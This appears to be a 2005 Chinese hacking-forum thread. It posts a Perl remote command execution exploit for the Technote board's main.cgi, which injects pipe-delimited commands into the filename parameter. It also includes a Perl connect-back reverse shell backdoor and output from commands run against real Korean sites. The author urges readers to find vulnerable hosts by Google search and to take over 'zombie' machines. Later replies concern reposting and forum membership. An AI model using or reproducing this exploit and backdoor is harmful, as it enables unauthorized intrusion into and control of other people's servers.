文章作者：无敌最寂寞[E.S.T]
信息来源：邪恶八进制 中国（www.EvilOctal.com）

technote是韩国某公司出品的一个论坛程序，在韩国的使用率挺高。。可惜它却有个”小小”
的漏洞，允许我们远程以web权限执行任意命令。。。HOHO，具体漏洞描述可以去http://www.nsfocus.net查找。。。我就不多说了。。。

程序源代码如下，用perl写的。。。懒得用c写。。有兴趣的朋友可以给改改。。。呵呵，用c里wininet的函数来处理也是非常容易的。。。

不要小看这个漏洞，去google搜索如下关键字：
/technote/main.cgi

你会找到很多肉鸡。。。。嘎嘎。。。

复制内容到剪贴板

代码:

#!usr/bin/perl
use LWP::UserAgent;

my $suburl='shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt||';
my $ua=new LWP::UserAgent;
print "*" x 70,"\n";
print "\t\t","technote main.cgi remote execution exploit POC","\n";
print "\t\t  ","  written by 无敌最寂寞[E.S.T]","\n";
print "*" x 70,"\n\n";
print "NOTICE:press CTRL+C to terminate this program!\n\n";
print "please Enter the target URL:";
my $url=<STDIN>;
chomp($url);
my $r=$url;
print "please Enter main.cgi path(default is technote/main.cgi/):";
my $cgi=<STDIN>;
if($cgi ne "\n")
{
chomp($cgi);
}
else
{$cgi=&#39;technote/main.cgi/&#39;;}

$url.=$cgi.$suburl;
while(1)
{     
     print "\nPlease Enter your command:";
     my $command=<STDIN>;
     chomp($command);
     my $temp=&#39;|&#39;.$command.&#39;|&#39;;
     $url=~s/\|(.*)\|/$temp/;
     print "the url to submit is $url\n";
     my $request=new HTTP::Request(&#39;GET&#39;=>$url);
     $request->header(&#39;Referer&#39;=>$r);
     my $res=$ua->request($request);
     if($res->is_success){
     print "+" x 60,"\n";
     print $res->content;
     print "+"x 60,"\n";
     }
     else{
     print("Error:".$res->status_line."\n");
     }
}

有点乱，没办法，我是一边看漏洞一边写的程序。。写完了。。也就没再改。。。懂perl的朋友给提高提高吧。。。呵呵

程序利用过程如下图：

需要说明的是：在URL那部分你必须输入类似：
http://www.sarm.co.kr/
后面要有一个“/"，别给漏了。。。因为我没费那劲去处理那些没有“/"的url。。
另外在输入main.cgi的路径的时候也要注意。输入类似下面的：
technote/main.cgi/

不要有前导"/"而且后面也要跟个“/"，如果是默认路径（即technote/main.cgi/）可以直接回车，不必输入。。。

程序只是一个proof of concept，需要添加其它功能的朋友可以随意修改代码。。但请保留原始出处信息。。。谢谢。。。。

放开了去找韩国肉鸡吧。。。（当然其它国也有。。。哈哈）
下面是代码下载：

找了一个 win平台的,结果这样:
执行dir 返回
Please Enter your command:dir
the url to submit is http://see21go.or.kr/technote/main.cgi/shop.pdf?down_num=54
66654&board=rebarz99&command=down_load&filename=rb9.txt|dir|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
WS_FTP.LOG  config.cgi  help.cgi   index.cgi   library   read.cgi
board     desktop.ini  iboard.cgi  infor.cgi   main.cgi  sendmail_1.cgi
config    folder.htt  image     install.shl  print.cgi  tip
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

执行net user返回
Please Enter your command:net user
the url to submit is http://see21go.or.kr/technote/main.cgi/shop.pdf?down_num=54
66654&board=rebarz99&command=down_load&filename=rb9.txt|net user|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

dir可以回显出结果,而net user 返回的是空!

呵呵，这很正常。。。。

5555我比你还倒霉。。。。看了一个韩国肉鸡。。。唉。。。是个linux的：

Please Enter your command:uname -a
the url to submit is http://www.bokuennews.com/technote/main.cgi/shop.pdf?down_n
um=5466654&board=rebarz99&command=down_load&filename=rb9.txt|uname -a|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Linux reweb-2.blueweb.co.kr 2.4.27 #1 2004. 08. 23. (岿) 21:10:32 KST i686 i686
i386 GNU/Linux
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

一看估计差不多能搞定。。唉。。。一开始不能运行gcc，就以为没有gcc，现写了一个perl的反响连接后门，如下；

复制内容到剪贴板

代码:

#!/usr/bin/perl

use Socket;

print "Connect Back Backdoor\n\n";

if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}

print "[+] Checking arguments\n";

$host = $ARGV[0];
$port = 80;

if ($ARGV[1]) {
  $port = $ARGV[1];
}

print "[+] Trying to connect...\n";

$proto = getprotobyname(&#39;tcp&#39;) || die("[-] Unknown Protocol\n");

socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Socket Error\n");

my $target = inet_aton($host);

if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
  die("[-] Unable to Connect\n");
}
print "OK!\n";
print "[+] Spawning a Shell for U!\n";

if (!fork( )) {
  open(STDIN,">&SERVER");
  open(STDOUT,">&SERVER");
  open(STDERR,">&SERVER");

  exec {&#39;/bin/sh&#39;} &#39;-bash&#39; . "\0" x 4;
  exit(0);
}

print "[*] Bingo!Got it!\n\n";

先得到了一个反向的shell。。。。进去一看，不是没有gcc。。是人家不让运行。。。。55555

干！

这种是不是用乱刀可以暴力破解出来，一直听话
乱刀没用过。。。

实在不好意思,我刚才看了一下,我好象能发言在这里(怎么成了vip group了??).
@无敌最寂寞 有无可能让我转载一下你的这篇文章,保留所有版权信息.
=============
不好意思,打扰你们了....................

引用:

下面是引用bluetooth于2005-02-03 01:09发表的:
实在不好意思,我刚才看了一下,我好象能发言在这里(怎么成了vip group了??).
@无敌最寂寞 有无可能让我转载一下你的这篇文章,保留所有版权信息.
=============
不好意思,打扰你们了....................

是发现您数月来 几乎每周都有好几天可以看见您的名字在在线列表
要知道....普通会员是只能在建议版面回复的 这样你都坚持登录浏览 你的执卓告诉我 你可能不是普通的人
既然你已经以这样的方式支持邪恶八进制 我们应该给予你一些你所应该得到的权利 何况 这么长的时间 这里的规矩 你也早就懂了 如何发主题 如何做讨论 我相信你也早就心里有数了....
要么就是毅力特别强的人 要么就是那种特别傻的人 所以开了VIP：）

引用:

下面是引用bluetooth于2005-02-03 01:09发表的:
实在不好意思,我刚才看了一下,我好象能发言在这里(怎么成了vip group了??).
@无敌最寂寞 有无可能让我转载一下你的这篇文章,保留所有版权信息.
=============
不好意思,打扰你们了....................

没问题欢迎转载！

呵呵,我是属于比较傻的人,十分的感谢你们给的机会.
没办法,比较喜欢这个,不过水平没办法和你们比,只有好好学习的份儿.
我平时搞的东西没办法在这里发.............
再次感谢

引用:

下面是引用bluetooth于2005-02-03 01:28发表的:
呵呵,我是属于比较傻的人,十分的感谢你们给的机会.
没办法,比较喜欢这个,不过水平没办法和你们比,只有好好学习的份儿.
我平时搞的东西没办法在这里发.............
再次感谢

谦虚了：）
另外这里文章都是免费发出来了 自然是免费转载 只注意作者和出处就可以了...
好了 大家以后共同努力吧